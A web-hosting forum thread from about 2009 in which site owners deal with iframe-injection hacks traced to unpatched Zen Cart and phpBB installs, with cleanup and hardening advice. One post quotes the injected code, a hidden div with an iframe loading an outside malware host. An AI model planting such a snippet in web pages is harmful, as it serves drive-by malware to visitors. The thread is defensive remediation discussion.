My Site Hacked Big Time [merged threads]

[Chris_S]

I just checked and the permissions are set to 644 for .js and .css files and 755 for .html files. Some .jpgs are 755 and some are 644. I Don't know why they are different.

When designing my website years ago I had reasons for using iframes but that was a long time ago so I don't remember what was going through my head. I will try to explain.

- I don't like how most sites have the entire window 'refresh' whenever a user clicks a link in a menu.
- I like to have control over the individual pages for each image and gallery section.
- If I didn't use iframes then I would have one huge page with everything hidden. Then use css/js to unhide and display the images and text. or I would have many pages that would include the same main menu and that doesn't seem very efficient. My logic may be flawed. Don't know a whole lot on scripting.
- Requires less scripting to create the effect I want.

It really doesn't matter the reasons as i'm willing to consider alternatives just as long as it creates the same effect that's already on the site.

[snowmaker]

644 is fine for all .js, .css and .html files. 755 is fine for directories. .js files could be fine with permission down to 600. PHP included files, and .php files themselves will mostly work fine at 600. A PHP included directory could be down to 700. Just remember, every file/directory shouldn't have more permissions than it needs to be run, IOW (In Other Words), don't set anything any higher than 644/files, 755/directories. If a script needs higher permissions to be run correctly, scrap it.

The way a webpage 'acts' because of iframes, can be almost always, and probably be better duplicated with PHP includes.

[tpoynton]

sounds like you want ajax, which does require more scripting - although I have no real idea because I only know how it works in theory...i'd call iframes a shortcut - with all the potential issues.

I wonder if using iframes to call content from your own site has the same security risks as using it to get content from somewhere else?

[Chris_S]

Yea this is becoming a bit more complicated then I hoped. Can someone tell me how exactly hackers use iframes. From what I read it was hackers creating sites using iframes to hack search engine results and had nothing to do with hackers hacking a legitimate site that uses iframes. I did play around with php scripts and it seemed a lot slower. Browser side scripting I would rather stick with.

The only issues I see(with my limited knowledge) with iframes are that search engines don't search the pages within iframes and that it's no longer a W3C standard.

snowmaker thanks for the tips. I will do some reseach on file permissions.

[snowmaker]

To give you more of an idea how PHP includes can be used, see any of the sites in my sig. There's basically one file, index.php, that includes a text file to make up a page based on the link clicked.

[Chris_S]

Thanks. That's the right idea. Is there anyway to get rid of the entire page 'flicker' in ie? firefox I don't see it though. or use php to load a page with in an element so the entire page doesn't have to reload?

[snowmaker]

I wasn't aware of any flicker-type issues with any of my sites, in any browser that they do work in, I'll have to take a look at that. PHP and CSS can be used well together. See here, 22 Resources to Easily Create CSS Layouts | Vandelay Design Blog

[HalfaBee]

You don't need to use php for AJAX like pages.
You can just load the static pages via JS and display them in a <div>.

I don't think the iframes are the way the hackers are hacking sites, it is just that they insert an iframe with a link to malware.

[Croc Hunter]

I've had several old clients contact me complaining of this lately. 9/10 infected sites are running out of date applications like Wordpress, Zencart, Movable Type and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.

You have to update the applications and reset every database, FTP, OPS account, etc passwords. Then cleanup all other infected files and don't let anyone login until they've run Malwarebytes.

I searched and searched for a script to strip out the <div style="display:none">blahcrapolablah<iframe width=436 height=773 src="http://russian-crap.ru:1234/index.php" ></iframe></div><div style="display:none">

How hard would a cleanup script be to write? I tried a few times but it's a bit beyond me. Can someone write it? I would pay. Some of these guys have hundreds of thousands of files and of course.. no backups.

[Chris_S]

Quote:

Originally Posted by Croc Hunter

and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.

I think that's what happened but instead of inserting iframe code an unescape javascript function was inserted into every page.

If no one else has anthing to add I will delete everything off the server and refresh it from the back ups.

Thanks again for the help.

[GoldenEagles]

This is my first experience having my website "hacked", or invaded. Isn't there a law against this? I thought I was safe.

On 9/1/2009 at 3:10 into 3:11 every one of the several hundred html files on my site was modified. This "Iframe" tag was added to EVERY html file.

<<iframe details removed>>

This attack dug deep into every directory and subdirectory, and did not miss one html file (and it covered index.php files too.)

I don't know exactly what this "IFRAME" tag is supposed to do, or how it does it, this is all very new to me, but apparently this simple addition will result in malware being loaded onto a visitor's computer. As a result, Google diagnostics has labeled my site "suspicious."

(Can someone please explain how this "Iframe" tag can cause malware to be downloaded to my visitor's computer? How is that possible?)

I did not discover the issue until today. And I immediately spent about 4 hours uploading clear copies of every HTML file. (I had other plans for my time, I can assure you).

I want to know if this has happened to anyone else on powweb recently. Is this a system or a network issue? Or was my site singled out for this treatment?

And I want to know how in the world this could have happened. I thought I was the only one who could modify files on my site. But here, several hundred HTML files were modified without my consent or knowledge. Every html file on the site. Did not miss one of them. Several hundred.

Can someone PLEASE give me an idea of where to start looking to try to understand how this happened, so hopefully I can do something that will make sure it will never happen again?

Sincerely,
GoldenEagles

[HalfaBee]

Hacking mostly occurs due to old versions of CMS's like wordpress etc.

Please remove the offending URL from your post.

[Croc Hunter]

It's a trojan keystroke recorder. I've had to cleanup several accounts here and at another host. I wish someone clever would write a little script to strip out the <iframe>*</iframe> infection.

Here's a quick what to do guide.
1. Install update and scan your PC with Malwarebytes
2. Update and scan your PC/Mac with your antivirus
3. Restore the oldest site backup from in OPS or your own clean backup.
4. Download the latest version of any application like WordPress, ZenCart, Gallery etc you use. Upload it overwriting the existing files. Also upgrade your local applications like FileZilla.
5. Go through and manually remove the iframe code from ALL index home and default files account wide (even files like default-widgets or home2). Don't forget plugins, themes, forum pages etc. (while slow it's safe to do this via OPS FileManager).
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.
7. Once you are positive you are clean create a backup!
8. Wait 24hrs. If you do not get re-infected request a review of your site through Google webmaster tools.

[GoldenEagles]

Responding to Halfabee first,

I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistenly, a few times week.

Perhaps these things are akin to some of what you are referring to?

Is there any way to pin down, with a high degree of certainty, whether either of these two avenues were used as the attack path?

p.s. I zipped both installations, and deleted the active folders last night. O yes, and I found three files in my cgi-bin that I know I did not put there. I deleted them too.

[GoldenEagles]

Quote:

Originally Posted by Croc Hunter

It's a trojan keystroke recorder.

Please explain what is this trojan keystroke recorder? and how that would relate to an attack like this? According to the date and time stamps of the corrupted files, several hundred files were modified in about one minute. That is, several hundred append actions were accomplished in about one minute, That is, the rogue "Iframe" tag set was appended to several hundred html files in about one minute.

[Croc Hunter]

You'd be best to Google it. Once they get access they execute a script to find any index etc and insert the code. It only takes a minute or two. All but one of the accounts I've cleaned so far had out of date ZenCarts. Follow the steps I posted.

[Dbrazzell]

Most these iframes that get inserted into the sites send visitors over to another third party site that sitting waiting to give you the latest drive by download which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phising schemes.

Its really all up to whos running the third party site and what they are feeling like pushing that day.

Its setup so they only have to infect your site once with the malicious iframe. But they can change what visitors are infected with at any time they feel like it.

I have seen the SEO spamming stuff that someone earlier mentioned. That seems to be a lot rarer.

[sinbsd]

What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to it's security upkeep?

[GoldenEagles]

Quote:

Originally Posted by sinbsd

What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to it's security upkeep?

As noted above, in response to halfabee:

I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the zen cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IP's trying to access the zen cart. And this was consistenly, a few times week.

I archived both installations, and deleted the active folders, and just to be safe, I transferred the zipped archives to my local machine. My site is now script free. I think I have closed all the doors.

Any further ideas that you might have, I would like to hear.

[GoldenEagles]

Quote:

Originally Posted by Dbrazzell

Most these iframes that get inserted into the sites send visitors over to another third party site that sitting waiting to give you the latest drive by download which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phising schemes.

I would like to know how this could be done so easily. Does malware strategy depend on security holes in the browser, and if so, which browser is most vulnerable? And why are these holes not plugged?

Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser? Isn't that right?

[snowmaker]

Quote:

Originally Posted by GoldenEagles

Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser?

Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search

[GoldenEagles]

Quote:

Originally Posted by snowmaker

Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search

I did that search on Google, and I see that the most recent reference to this issue is more than three years old. For that reason, I am concluding that ActiveX controls do not seem to be an issue of high security concern when it comes to majority of avenues used to infect PC's with malware. And I suppose this is especially true because their download is signaled, and the user can choose to reject the download.

From what I understand, the issue that we are dealing with here, are ways to get around download detection routines in the browser, where these malicious programs end up on the person's computer, and running on the person's computer, without the user having any idea that anything at all has been downloaded. Isn't that right?

And I would ask the question again, why aren't these security holes closed? Or perhaps they are closed, but some users don't update their browser to the latest release? Or perhaps, if one hole is closed, that patch itself has a hole in it that the hackers find and exploit. I wonder if someone could give a definitive answer on this point.

[GoldenEagles]

I wanted to give an update on my search for the path that this hacker may have exploited into my website.

As I noted above, I zipped my outdated installation of both Zen Cart and PhpBB3. And I downloaded those archives to my local computer. And I deleted both the zipped archives, and the installation folders for these applications from my website.

Locally, I ran an Avira scan on these two zipped archives.

The phpbb3 archive did not show anything but a few of the iframe infections that I had missed when I first uploaded clean html files into every directory.

However, the Zen Cart archive showed the following infections:

--> Zen_Cart_Installation/images/juno-user
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Katien.R back-door program
--> Zen_Cart__Installation/images/ycplia.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
--> Zen_Cart__Installation/images/fdqthz.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus

I think it is fair to conclude from this, that it is highly probable that the attack on my website came through the Zen Cart installation, which as I noted, had never been used, had never been rolled out for public use, nor had it been updated with any security patches for one year.

When I visited the Zen Cart website a few days ago to look at what security issues had come up during that time period, I found a few that were very serious, and they discussed them openly, and they immediately issued patches. For Zen Cart operators who are paying attention, they could be relatively safe, if they installed the patches immediately. However, their openness in this regard, also gives the hackers exactly the information they need to exploit those zen cart installations where the patches are not installed (like mine). In this regard, I saw a distinct difference in the PHPBB3 approach to security. On the PHPBB3 site, there were no open discussions concerning the details of sercurity issues. Users could report security issues to their security center, but those posts were kept private, and there were no public forums detailing the precise security issues that had come up. This was an obvious choice on their part, as such information can be used by the hackers too as noted.

I would just note from this, that one thing we might learn from this, is that Zen Cart operators should be very careful about following the security issues on the Zen Cart website (as the hackers are obviously following their announcements), and when patches are provided, that these should be implemented immediately. Zen Cart operators should have this goal in mind, that the patches be implemented faster than the hackers can find an unguarded Zen Cart.

I can imagine this, that these hackers have robots combing the web for the presence of Zen Cart installations, and the very minute a security issue is brought forward on the Zen Cart site, they can tell their robot where to look for the newest vulnerability. In support of this thesis, I note that my website is crawled by dozens of robots every day. What are they looking for? Moreover, as I mentioned above, I had seen in my website access logs repeated accesses to the zen cart installation, which was inexlicable to me at the time because I was not aware that I had told anyone that it was there. I did not know what to make of this at the time. These hackers might send their robots out looking for many other kinds of cgi/php installations, but for zen cart, this looks rather easy to exploit given their openness in laying bare the details of the holes found in their security. This is not a criticism of them on this point however. Their openness in this regard is largely due, I think, to the fact that the implemention of security patches in Zen Cart, requires the user to manually modify php code in one or more files. And so, the file names and code have to be laid bare for all users so that the "patches" can be implemented.

This is far different from Windows Update for example, where updates are downloaded, and automatically installed, without anyone seeing the nature of the fix that is being implemented.

From my short visit to the PHBBB3 website, I get the sense that PHPBB3 also uses this modular updating approach, where the public does not see the details of the code that is being modified when they issue a security patch, that it is done more or less automatically.

[mark anthony]

hi there!!

Ho will i know that my account or site is being hacked? I am suspecting something's bad happening to my site

[rainbore]

One way to check your site is to use Google's Safebrowsing diagnostic tool. Just enter

Code:

http://www.google.com/safebrowsing/diagnostic?site=www.yoursite.com 

Just replace "www.yoursite.com" with your own domain name. This tool will show you if any of Stopbadware's partners have reported your site as being suspicious. Another good online tool is Unmask Parasites which scans webpages for common hacks in real time. If you know HTML, there's a new tool in the Google Webmaster Tools console under "Labs" that will show you what Googlebot sees when it fetches pages from your site. Some hacks only reveal themselves to Googlebot, so this can be useful. Another good idea is to do a simple "site:" search in Google to see if Google has indexed anything that you don't recognize as your own.

You can also use the Powweb File Manager or whatever FTP program you use to check the modification dates on all of the files on your site. If the dates on the site don't match the dates when you last uploaded the files or if the file sizes don't match, it's a sign of trouble.

There's some very good information available at stopbadware.org's Tips for Cleaning and Securing Your Website.

Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC, and every webmaster should be sure to use such software to prevent their website account information from being stolen. This is becoming a more common issue, although it still is not how the majority of sites get hacked. But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

If you run any blog, forum, gallery, CMS, shopping cart or other common script, you should make it a part of your routine site maintenance to check to make sure that you are running the latest version. By far the most common means by which hackers gain access to a site is through known vulnerabilities in older versions of popular scripts. Since many scripts promote themselves automatically on every page they generate, often all that a hacker has to do to locate a vulnerable site is to do a Google search for the software name and the version number, so don't think that just because your site isn't that popular or that you don't do much with these scripts that you are safer.

[GoldenEagles]

Rainbore, that was all together a good and informative post. However, I would address this particular point ....

Quote:

Originally Posted by rainbore

Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC .... But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

After recognizing the hack attack on my website which inserted a rogue iframe tag in every html page, and index.php pages, hundreds of pages all together, I replaced all the html pages with clean pages. Because of the complexity of the file structure I did not do this for my Zen Cart installation. For this, I zipped the whole installation, and then downloaded the archive to my PC. I then ran an Avira scan on that zipped archive, and Avira found every rogue Iframe, and it also found three additional trojans scripts, the purpose of which I am assuming, was to give the hacker direct access to my website.

Therefore, I must observe, that your statement quoted above, "that these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good ..." Seems to be too broad of a generalization. It may be true that some anti-virus packages may not be useful in this regard. But Avira seemed to do an excellent job in the situation I just described.

[Croc Hunter]

I disgree GoldenEagle, rainbore's advice is entirely accurate. Most people have never even heard of Avira. It's not in the current top ten most popular antivirus. Big brand names like Norton and PC-Cillin don't even rank, that puts you in the minority. The lucky minority at that in this case.

I pretty much told you it was Zencart back on post #51 ~smack~ Look in your antivirus vault, name the 3 rogue files you found and where exactly you found them. It will help others here and I'd like to research them further. It is more than likely your Zencart database is corrupt so delete "drop" it if you can along with any other unused databases. Then check all user tables of remaining databases for suspect entries.

[Chris_S]

Quote:

Originally Posted by Croc Hunter

6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.

What do you mean by reflect your changes in the config files?

[GoldenEagles]

Quote:

Originally Posted by Croc Hunter

Most people have never even heard of Avira. It's not in the current top ten most popular antivirus.

Since 2004, Av-Comparatives.Org has run comprehensive tests on a variety of anti-virus products. They have included Avira in the tests since 2006.

avast! Professional Edition 4.8
AVG Anti-Virus 8.5
AVIRA AntiVir Premium 9
BitDefender Antivirus 2010
eScan Anti-Virus 10
ESET NOD32 Anti-Virus 4.0
F-Secure Anti-Virus 2010
G DATA AntiVirus 2010
Kaspersky Anti-Virus 2010
Kingsoft Antivirus 2009
McAfee VirusScan Plus 2009
Microsoft Live OneCare 2.5
Norman Antivirus & Anti-Spyware 7.10
Sophos Anti-Virus 7.6
Symantec Norton Anti-Virus 2010
TrustPort Antivirus 2009

Avira not only had the overall highest detection rate, but Avira had
the highest detection rate in each of the test categories.

Windows Viruses
Macro viruses
Script Malware
Worms
Backdoors/Bots
Trojans
other malware

I hope this information update will be helpful to you.

[shrupa]

Try rhis .ftpaccess to limit FTP access through your IP only. Try this not sure will work
upload the file to root. enter your IP instead of w.x.y.z!!!!
<Limit ALL>
DenyAll
Allow w.x.y.z
</Limit>

[snowmaker]

Quote:

Originally Posted by shrupa

Try this .ftpaccess to limit FTP access through your IP only. Try this not sure will work..

It does. For me anyway.. I'm quite sure it'll work for everybody else too..

[mpk]

Another good tool to use is the website secunia.org. They have a page http://secunia.com/advisories/product/ that will list known vulnerabilities for a vast amount of applications including zencart, phpbb, etc.

A few additional things that should trigger anybody to be cautious and check their account for signs of unauthorized activity:
- sudden large number of unfamiliar email bouncebacks
- sudden large increase in site traffic seen through visitor stats without a marketing campaign
- A file in your account executes code that has been obfuscated

Obfuscation is usually done through base64 encoding / decoding but may also be done through character switching, character arrays, and many other methods.

Please feel free to contact support if you suspect a file in your account has been hacked and need help.